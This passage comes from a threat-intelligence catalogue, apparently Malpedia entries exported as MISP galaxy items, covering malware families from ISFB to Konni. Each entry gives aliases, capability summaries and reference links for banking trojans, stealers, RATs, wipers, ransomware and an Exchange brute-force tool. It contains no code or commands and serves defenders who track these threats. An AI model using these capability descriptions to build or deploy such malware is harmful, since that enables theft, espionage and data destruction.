https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/

https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/

https://go.recordedfuture.com/hubfs/reports/mtp-2022-0324.pdf

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://experience.mandiant.com/trending-evil-2/p/1

https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/

ISFB

  • 2006: Gozi v1.0, Gozi CRM, CRM, Papras

  • 2010: Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)

In September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merged with Pony and became Vawtrak/Neverquest.

The other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.

There is one panel which often was used in combination with ISFB: IAP. The panel’s login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.

ISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.

In April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB which needs Nymaim to run. The C2 communication is performed by Nymaim.

See win.gozi for additional historical information.

The tag is: misp-galaxy:malpedia="ISFB"

ISFB is also known as:

  • Gozi ISFB

  • IAP

  • Pandemyia

Table 3758. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb

https://www.cyberbit.com/new-ursnif-malware-variant/

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://0xtoxin.github.io/threat%20breakdown/Gozi-Italy-Campaign/

https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/

https://redcanary.com/resources/webinars/deep-dive-process-injection/

https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245

https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/

https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/

https://lokalhost.pl/gozi_tree.txt

https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization

https://www.youtube.com/watch?v=jlc7Ahp8Iqg

https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html

https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass

https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html

https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware

https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/

https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/

https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/

https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html

https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/

https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/

https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/

https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf

https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work

https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://www.youtube.com/watch?v=KvOpNznu_3w

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf

https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489

https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them

https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/

https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/

https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif

https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/

https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html

https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/

https://github.com/mlodic/ursnif_beacon_decryptor

https://twitter.com/JAMESWT_MHT/status/1712783250446328114?t=iLKXzsZuS1TTa0i9sZFkQA&s=19

http://benkow.cc/DreambotSAS19.pdf

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf

https://blog.group-ib.com/gozi-latest-ttps

https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15

https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks

https://blog.yoroi.company/research/ursnif-long-live-the-steganography/

https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update

https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/

https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/

https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/

https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/

https://threatresearch.ext.hp.com/detecting-ta551-domains/

https://www.tgsoft.it/files/report/download.asp?id=7481257469

https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html

https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.bridewell.com/insights/news/detail/hunting-for-ursnif

http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html

https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/

https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle

https://www.tgsoft.it/files/report/download.asp?id=568531345

https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features

https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/

https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/

https://blog.talosintelligence.com/2020/07/valak-emerges.html

https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0

https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion

https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/

https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/

https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware

https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072

https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/

https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/

https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef

ISR Stealer

ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper. ISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.

Incredibly, it uses a hard-coded user agent string: HardCore Software For : Public

The tag is: misp-galaxy:malpedia="ISR Stealer"

ISR Stealer is also known as:

Table 3763. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer

https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/

IXWare

The tag is: misp-galaxy:malpedia="IXWare"

IXWare is also known as:

Table 3765. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ixware

https://fr3d.hk/blog/ixware-kids-will-be-skids

Jackal

According to Kaspersky Labs, this malware tool set has been used by APT group GoldenJackal, which has been observed since 2019 and which usually targets government and diplomatic entities in the Middle East and South Asia with espionage. It consists of multiple components and is written in .NET.

The tag is: misp-galaxy:malpedia="Jackal"

Jackal is also known as:

Table 3766. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jackal

https://securelist.com/goldenjackal-apt-group/109677/

JackPOS

The tag is: misp-galaxy:malpedia="JackPOS"

JackPOS is also known as:

Table 3767. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos

Jager Decryptor

The tag is: misp-galaxy:malpedia="Jager Decryptor"

Jager Decryptor is also known as:

Table 3769. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor

JanelaRAT

According to Zscaler, JanelaRAT is a heavily modified variant of BX RAT. Its focus is set on harvesting LATAM financial data and its method of extracting window titles for transmission underscores its targeted and stealthy nature. With an adaptive approach utilizing dynamic socket configuration and exploiting DLL side-loading from trusted sources, JanelaRAT poses a significant threat.

The tag is: misp-galaxy:malpedia="JanelaRAT"

JanelaRAT is also known as:

Table 3771. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.janela_rat

https://www.zscaler.com/blogs/security-research/janelarat-repurposed-bx-rat-variant-targeting-latam-fintech

jason

Jason is a graphical tool implemented to perform Microsoft Exchange account brute-force in order to “harvest” the highest possible number of emails and account information. Distributed in a ZIP container, the interface is quite intuitive: the Microsoft Exchange address and its version shall be provided. Three brute-force methods can be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password lists can be selected, and the number of threads should be provided in order to optimize the attack balance.

The tag is: misp-galaxy:malpedia="jason"

jason is also known as:

Table 3773. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jason

https://www.secureworks.com/research/threat-profiles/cobalt-gypsy

https://marcoramilli.com/2019/06/06/apt34-jason-project/

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://twitter.com/P3pperP0tts/status/1135503765287657472

JCry

Ransomware written in Go.

The tag is: misp-galaxy:malpedia="JCry"

JCry is also known as:

Table 3775. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jcry

https://twitter.com/IdoNaor1/status/1101936940297924608

https://twitter.com/0xffff0800/status/1102078898320302080

Jeno

Ransomware.

The tag is: misp-galaxy:malpedia="Jeno"

Jeno is also known as:

  • Jest

  • Valeria

Table 3776. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jeno

https://id-ransomware.blogspot.com/2020/04/jeno-ransomware.html

JessieConTea

JessieConTea is a remote access trojan that uses HTTP(S) for communication. It supports around 30 commands that include operations on the victim’s filesystem, basic process management, file exfiltration (both plain and zipped), and the download and execution of additional tools from the attacker’s arsenal. The commands are indexed by 32-bit integers, starting with the value 0x60D49D97.

The malware was delivered in the wild via trojanized applications like DeFi Wallet or Citrix Workspace.

JessieConTea generates POST parameters with a specific parameter name, jsessid, from which the initial part of its name is derived. Also, it contains a specific RTTI symbol ".?AVCHttpConn@@", which inspired the second part of the name. It uses RC4 for C&C traffic encryption.

The tag is: misp-galaxy:malpedia="JessieConTea"

JessieConTea is also known as:

Table 3777. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea

https://securelist.com/lazarus-trojanized-defi-app/106195/

https://cn.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf

https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html

https://asec.ahnlab.com/en/57685/

JhoneRAT

Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.

The tag is: misp-galaxy:malpedia="JhoneRAT"

JhoneRAT is also known as:

Table 3778. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://blog.talosintelligence.com/2020/01/jhonerat.html

https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/

Jigsaw

According to PCrisk, Jigsaw is ransomware that uses the AES algorithm to encrypt various files stored on computers. Targeted files include .jpg, .docx, .mp3, .mp4, and many others.

The tag is: misp-galaxy:malpedia="Jigsaw"

Jigsaw is also known as:

Table 3779. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw

https://threatmon.io/solving-the-puzzle-reversing-the-new-stealer-jigsaw/

Jimmy

The tag is: misp-galaxy:malpedia="Jimmy"

Jimmy is also known as:

Table 3780. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy

https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/

JLORAT

The tag is: misp-galaxy:malpedia="JLORAT"

JLORAT is also known as:

Table 3781. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jlorat

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

Joao

The tag is: misp-galaxy:malpedia="Joao"

Joao is also known as:

Table 3783. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.joao

https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/

JQJSNICKER

The tag is: misp-galaxy:malpedia="JQJSNICKER"

JQJSNICKER is also known as:

Table 3786. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker

http://marcmaiffret.com/vault7/

JUMPALL

According to FireEye, JUMPALL is a malware dropper that has been observed dropping HIGHNOON/ZXSHELL/SOGU.

The tag is: misp-galaxy:malpedia="JUMPALL"

JUMPALL is also known as:

Table 3791. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.jumpall

https://content.fireeye.com/apt-41/rpt-apt41/

Kami

A Telegram bot with browser stealing capabilities, written using the .NET framework.

The tag is: misp-galaxy:malpedia="Kami"

Kami is also known as:

Table 3794. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kami

https://twitter.com/jaydinbas/status/1604918636422070289

Kardon Loader

According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, e.g. banking trojans, credential theft, etc. This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop, in which case any customer can establish their own operation and further sell access to a new customer base.

The tag is: misp-galaxy:malpedia="Kardon Loader"

Kardon Loader is also known as:

Table 3796. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader

https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab

https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/

Karius

According to Check Point, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrak as well as Trickbot, and currently implementing webinject attacks only.

It comes with an injector that loads an intermediate "proxy" component, which in turn loads the actual banker component.

Communication with the C2 is in JSON format and encrypted with RC4 using a hardcoded key.

In the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions they were received from the C2.

The tag is: misp-galaxy:malpedia="Karius"

Karius is also known as:

Table 3797. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.karius

https://research.checkpoint.com/banking-trojans-development/

https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/

https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest

KazyLoader

According to Karsten Hahn, a straightforward loader that runs assemblies from images.

The tag is: misp-galaxy:malpedia="KazyLoader"

KazyLoader is also known as:

Table 3802. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kazyloader

https://twitter.com/struppigel/status/1501105224819392516

KDC Sponge

The tag is: misp-galaxy:malpedia="KDC Sponge"

KDC Sponge is also known as:

Table 3803. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kdcsponge

https://us-cert.cisa.gov/ncas/alerts/aa21-336a

KEKW

Ransomware.

The tag is: misp-galaxy:malpedia="KEKW"

KEKW is also known as:

  • KEKW-Locker

Table 3805. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kekw

https://id-ransomware.blogspot.com/2020/03/kekw-ransomware.html

Keona

The tag is: misp-galaxy:malpedia="Keona"

Keona is also known as:

Table 3807. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.keona

https://twitter.com/3xp0rtblog/status/1536704209760010241

Ketrum

Intezer found this family in mid-May 2020; it appears to be a merger of the families Ketrican and Okrum.

The tag is: misp-galaxy:malpedia="Ketrum"

Ketrum is also known as:

Table 3810. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum

https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/

KHRAT

According to Unit42, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.

The tag is: misp-galaxy:malpedia="KHRAT"

KHRAT is also known as:

Table 3817. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat

https://unit42.paloaltonetworks.com/atoms/rancortaurus/

https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/

https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/

https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor

Kikothac

The tag is: misp-galaxy:malpedia="Kikothac"

Kikothac is also known as:

Table 3818. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac

https://www.group-ib.com/resources/threat-research/silence.html

KillDisk

KillDisk is a generic detection name used by ESET to refer to destructive malware with disk wiping capabilities, such as damaging boot sectors and overwriting then deleting (system) files, followed by a reboot to render the machine unusable. Although all KillDisk malware has similar functionality, as a generic detection, individual samples do not necessarily have strong code similarities or relationships. Such generic malware detections usually have many “sub-families”, distinguished by the detection suffix (e.g. KillDisk.NBO, KillDisk.NCV, and KillDisk.NCX). Sub-family variants that do have strong code similarities are sometimes seen in separate cyberattacks and thus can help researchers make connections between them.

The tag is: misp-galaxy:malpedia="KillDisk"

KillDisk is also known as:

Table 3820. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk

https://www.secureworks.com/research/threat-profiles/iron-viking

https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/

https://attack.mitre.org/groups/G0034

http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

https://www.youtube.com/watch?v=mrTdSdMMgnk

KilllSomeOne

The tag is: misp-galaxy:malpedia="KilllSomeOne"

KilllSomeOne is also known as:

Table 3821. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.killsomeone

https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/

Kimsuky

The tag is: misp-galaxy:malpedia="Kimsuky"

Kimsuky is also known as:

Table 3823. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky

https://blog.alyac.co.kr/2347

https://blog.prevailion.com/2019/09/autumn-aperture-report.html

https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html

https://inquest.net/blog/2021/08/23/kimsuky-espionage-campaign

https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf

https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Kim.pdf

https://threatmon.io/unraveling-the-layers-analysis-of-kimsukys-multi-staged-cyberattack/

https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9

https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/

https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html

https://asec.ahnlab.com/en/37396/

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/

https://asec.ahnlab.com/en/30532/

https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html

https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure

https://metaswan.github.io/posts/Malware-Kimsuky-group’s-resume-impersonation-malware

https://asec.ahnlab.com/en/53046/

Klackring

According to Microsoft, the threat actor ZINC uses Klackring as a second-stage malware dropped by ComeBacker; both were used in attacks against security researchers.

The tag is: misp-galaxy:malpedia="Klackring"

Klackring is also known as:

Table 3827. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.klackring

https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/

KleptoParasite Stealer

KleptoParasite Stealer is advertised on Hackforums as a noob-friendly stealer. It is modular and comes with an IP retriever module, an Outlook stealer (32-bit/64-bit) and a Chrome/Firefox stealer (32-bit/64-bit). Earlier versions come bundled (loader plus modules); newer versions come with a loader (167k) that fetches the modules.

PDB strings suggest a relationship to JogLog v6 and v7.

The tag is: misp-galaxy:malpedia="KleptoParasite Stealer"

KleptoParasite Stealer is also known as:

  • Joglog

  • Parasite

Table 3828. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kleptoparasite_stealer

KlingonRAT

The tag is: misp-galaxy:malpedia="KlingonRAT"

KlingonRAT is also known as:

Table 3829. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.klingon_rat

https://www.intezer.com/blog/malware-analysis/klingon-rat-holding-on-for-dear-life/

Knot

Ransomware.

The tag is: misp-galaxy:malpedia="Knot"

Knot is also known as:

Table 3831. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.knot

https://twitter.com/malwrhunterteam/status/1345313324825780226

Koadic

Koadic is an open-source post-exploitation framework for Windows, created by zerosum0x0 and available on GitHub. The framework is written in Python and can generate JScript and VBScript payloads which can be written to disk or mapped directly into memory. Its capabilities include remote desktop access, command execution, lateral movement via SMB, file transfer, credential theft using Mimikatz, port scanning, and system information collection. It can also collect specific system information and targeted files based on their name or extension.

The tag is: misp-galaxy:malpedia="Koadic"

Koadic is also known as:

Table 3832. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic

http://www.secureworks.com/research/threat-profiles/gold-drake

https://www.secureworks.com/research/threat-profiles/cobalt-ulster

https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf

https://www.secureworks.com/research/threat-profiles/cobalt-trinity

https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf

https://blog.tofile.dev/2020/11/28/koadic_jarm.html

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://github.com/zerosum0x0/koadic

https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

KoiVM

A loader written in .NET.

The tag is: misp-galaxy:malpedia="KoiVM"

KoiVM is also known as:

Table 3833. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.koivm

https://labs.k7computing.com/index.php/koivm-loader-resurfaces-with-a-bang/

KokoKrypt

The tag is: misp-galaxy:malpedia="KokoKrypt"

KokoKrypt is also known as:

Table 3834. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt

https://twitter.com/struppigel/status/812726545173401600

KOMPROGO

KOMPROGO is a signature backdoor used by APT32. It is capable of process, file and registry management, creating a reverse shell, running WMI queries and retrieving information about the infected system.

The tag is: misp-galaxy:malpedia="KOMPROGO"

KOMPROGO is also known as:

  • Splinter RAT

Table 3835. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.komprogo

https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2015-120808-5327-99

https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf

https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

Konni

Konni is a remote administration tool observed in the wild since early 2014. The Konni malware family is potentially linked to APT37, a North Korean cyber espionage group active since 2012. The group's primary victims are South Korean political organizations, as well as targets in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait and other parts of the Middle East.

The tag is: misp-galaxy:malpedia="Konni"

Konni is also known as:

Table 3836. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.konni

https://wezard4u.tistory.com/6693

https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/

https://threatmon.io/the-konni-apt-chronicle-tracing-their-intelligence-driven-attack-chain/

https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/

http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html

https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

https://blog.alyac.co.kr/2474

https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b

https://us-cert.cisa.gov/ncas/alerts/aa20-227a

https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant

https://cluster25.io/wp-content/uploads/2022/01/Konni_targeting_Russian_diplomatic_sector.pdf

https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html

http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html

